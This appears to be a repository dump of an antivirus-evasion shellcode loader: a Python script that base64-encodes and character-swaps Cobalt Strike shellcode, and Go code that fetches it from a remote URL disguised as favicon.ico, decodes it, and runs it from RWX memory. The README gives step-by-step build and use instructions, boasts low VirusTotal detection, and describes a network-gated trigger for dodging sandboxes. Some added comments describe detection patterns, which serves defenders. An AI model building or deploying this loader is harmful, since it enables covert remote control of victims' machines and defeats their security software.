├── go_shellcode_encode.py
├── main.go
└── README.md
/go_shellcode_encode.py:
--------------------------------------------------------------------------------
1 | import base64
2 | import random
3 | import numpy
4 |
5 |
# Placeholder for the raw payload bytes; the README says to paste the real
# buffer here before running the script.
buf1 = b"shellcode"
# Standard base64 first, then four alphabet characters (A, H, 1, T) are
# swapped for symbols that are outside the base64 alphabet. The text is
# therefore not decodable as base64 until the Go loader undoes the same
# four swaps in reverse; a detection written against plain base64 blobs
# will not match this output, the substitution pair set itself will.
b64shellcode = base64.b64encode(buf1).decode()
b64shellcode = b64shellcode.replace("A","#").replace("H","!").replace("1","@").replace("T",")")
print(b64shellcode)
10 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "encoding/base64"
5 | "strings"
6 | "syscall"
7 | "unsafe"
8 | "net/http"
9 | "net/url"
10 | )
// Lazily resolved kernel32 exports used by build. Going through
// NewLazyDLL/NewProc resolves the procedures at run time rather than through
// the static import table; the literal strings "VirtualAlloc" and
// "RtlMoveMemory" nonetheless remain visible in the compiled binary.
var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = kernel32.NewProc("RtlMoveMemory")
)
16 |
// build reverses the four-character substitution produced by
// go_shellcode_encode.py, base64-decodes the result and executes the decoded
// bytes inside this process:
//   - VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE (0x1000|0x2000),
//     PAGE_EXECUTE_READWRITE (0x40)) obtains a private RWX region;
//   - RtlMoveMemory copies the decoded buffer into that region;
//   - syscall.Syscall(addr, 0, 0, 0, 0) transfers control to the buffer.
// Every error return along the way (decode failure, allocation failure) is
// discarded. Detection note: an RWX private allocation immediately followed
// by a copy and a jump into it is the canonical self-injection pattern that
// memory scanners and API-monitoring rules look for.
func build(ddm string) {
	str1 := strings.Replace(ddm, "#", "A", -1)
	str2 := strings.Replace(str1, "!", "H", -1)
	str3 := strings.Replace(str2, "@", "1", -1)
	str4 := strings.Replace(str3, ")", "T", -1)
	sDec, _ := base64.StdEncoding.DecodeString(str4) // decode error ignored
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
	syscall.Syscall(addr, 0, 0, 0, 0) // addr is used as the "syscall" entry point, i.e. a jump into the buffer

}
// main is the trigger gate the README calls "条件触发式" (condition-triggered):
// it issues one GET to a hard-coded address and calls build only when the
// response status is 200. Anywhere the host is unreachable (offline analysis,
// a sandbox without that network) the Get error path returns silently and the
// payload is never decoded, which is the evasion the README is describing.
// That single GET is also the only network indicator emitted before the
// payload runs.
func main() {
	u, _ := url.Parse("http://192.168.150.131")
	q := u.Query()
	u.RawQuery = q.Encode() // the query is empty, so this leaves the URL unchanged
	res, err := http.Get(u.String())
	if err != nil {
		return
	}
	resCode := res.StatusCode
	res.Body.Close()
	if err != nil { // dead branch: err cannot have changed since the check above
		return
	}
	var y int = 200
	if resCode == y {
		build("payload") // "payload" is the placeholder for the encoded blob
	}
}
46 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 0x00 generate cobaltstrike shellcode
2 |
3 | `Attacks =>> Packages =>> Payload generate =>> Output =>> Raw =>> payload.bin`
4 |
5 | # 0x01 replace base64 shellcode
6 |
7 | `python go-shellcode.py payload.bin`
8 |
9 | ```
10 | import base64
11 | import random
12 | import numpy
13 | import sys
14 |
15 | # print len(sys.argv)
16 | # print sys.argv[0]
17 | # print sys.argv[1]
18 |
# Exactly one argument is required. The usage text presents it as the payload
# path, but the file actually opened below is the literal "payload.bin";
# sys.argv[1] is never read.
if len(sys.argv) != 2:
    sys.exit("[+] useage: python %s [File: payload.bin]"%sys.argv[0])
else:
    shellcode = open("payload.bin","rb").read()
    # Same transform as go_shellcode_encode.py: base64, then A/H/1/T swapped
    # for #/!/@/). The output is not valid base64 until the swaps are undone.
    b64shellcode = base64.b64encode(shellcode).decode()
    b64shellcode = b64shellcode.replace("A","#").replace("H","!").replace("1","@").replace("T",")")
    print("[+] b64shellcode= \n" + b64shellcode)
    # Written to favicon.txt; the README later serves it as favicon.ico,
    # presumably so the fetch blends in with ordinary web traffic.
    f = open("favicon.txt","wb")
    f.write(b64shellcode)
    f.close()
29 | ```
30 |
31 | # 0x02 compile main.go
32 |
33 | **`go build -ldflags="-w -s -H=windowsgui" shell.go`**
34 |
35 |
36 | ```
37 | package main
38 |
39 |
40 | import (
41 | "encoding/base64"
42 | "fmt"
43 | "io/ioutil"
44 | "net/http"
45 | "os"
46 | "strings"
47 | "syscall"
48 | "unsafe"
49 | "flag"
50 | )
// Lazily resolved kernel32 exports shared by runUrl and ReadFile. The
// procedures are looked up at run time rather than via the static import
// table, but the literal names remain as strings in the binary.
var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = kernel32.NewProc("RtlMoveMemory")
)
// runUrl fetches the encoded payload from url over HTTP, undoes the
// four-character substitution, base64-decodes it and runs the bytes from a
// fresh RWX allocation. Errors from Get, ReadAll and DecodeString are all
// discarded; a failed Get leaves resp nil and the Body access below panics.
// The allocate/copy/jump sequence is identical to the one in ReadFile.
func runUrl(url string) {
	resp, _ := http.Get(url)
	body, _ := ioutil.ReadAll(resp.Body)
	resp.Body.Close()

	// Reverse the #/!/@/) substitution applied by the encoder script.
	str1 := strings.Replace(string(body), "#", "A", -1)
	str2 := strings.Replace(str1, "!", "H", -1)
	str3 := strings.Replace(str2, "@", "1", -1)
	str4 := strings.Replace(str3, ")", "T", -1)
	sDec, _ := base64.StdEncoding.DecodeString(str4)
	// MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE: a private RWX region.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
	syscall.Syscall(addr, 0, 0, 0, 0) // control transfer into the buffer
}
71 |
72 |
// ReadFile is the offline counterpart of runUrl: the encoded payload is read
// from the local file at filepath instead of fetched. Open and ReadAll errors
// are printed but do not stop execution. The decode and injection steps are
// the same as in runUrl.
func ReadFile(filepath string) {
	f, err := os.Open(filepath)
	if err != nil {
		fmt.Println("read file fail", err)
	}
	defer f.Close()

	fd, err := ioutil.ReadAll(f)
	if err != nil {
		fmt.Println("read to fd fail", err)
	}

	// Reverse the #/!/@/) substitution applied by the encoder script.
	str1 := strings.Replace(string(fd), "#", "A", -1)
	str2 := strings.Replace(str1, "!", "H", -1)
	str3 := strings.Replace(str2, "@", "1", -1)
	str4 := strings.Replace(str3, ")", "T", -1)

	sDec, _ := base64.StdEncoding.DecodeString(str4) // base64 decode
	// MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE: a private RWX region.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec)))
	syscall.Syscall(addr, 0, 0, 0, 0) // control transfer into the buffer
}
95 |
// main picks the delivery mode from the command line: -u fetches the payload
// over HTTP (runUrl), -s reads it from a local file (ReadFile; the flag's help
// text says "shellcode" but the value is used as a path). Exactly two
// arguments after the program name are required; otherwise the process exits
// with status 0 and, because the usage lines are commented out, prints nothing.
func main() {

	var url string
	var code string

	flag.StringVar(&url, "u", "", "url")
	flag.StringVar(&code, "s", "", "shellcode")
	flag.Parse()

	if(len(os.Args) != 3){
		// fmt.Println("Usage:xxx.exe -u http://x.x.x.x/code.txt")
		// fmt.Println("Or xxx.exe -s base64_encode_shellcode")
		os.Exit(0)
	} else if url != "" {
		runUrl(url)
	}else{
		ReadFile(code)
	}
}
115 |
116 | ```
117 |
118 | # 0x03 get session
119 |
120 | **shell.exe -u http://172.16.242.1/favicon.ico**
121 |
122 | **shell.exe -s payload.txt**
123 |
124 | # bypassAV
125 | 条件触发式远控 VT 6/70 免杀国内杀软及defender、卡巴斯基等主流杀软
126 | ## 原理
127 | https://pureqh.top/?p=5412
128 | ## use
129 | 将shellcode填至go_shellcode_encode.py生成混淆后的base64 payload
130 | 然后将生成的payload填至main.go build("b64shellcode")
131 | 将main.go中的url替换为你vbs的某个网页或文本(局域网网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)
132 | 编译:go build -ldflags="-w -s -H=windowsgui"
133 |
--------------------------------------------------------------------------------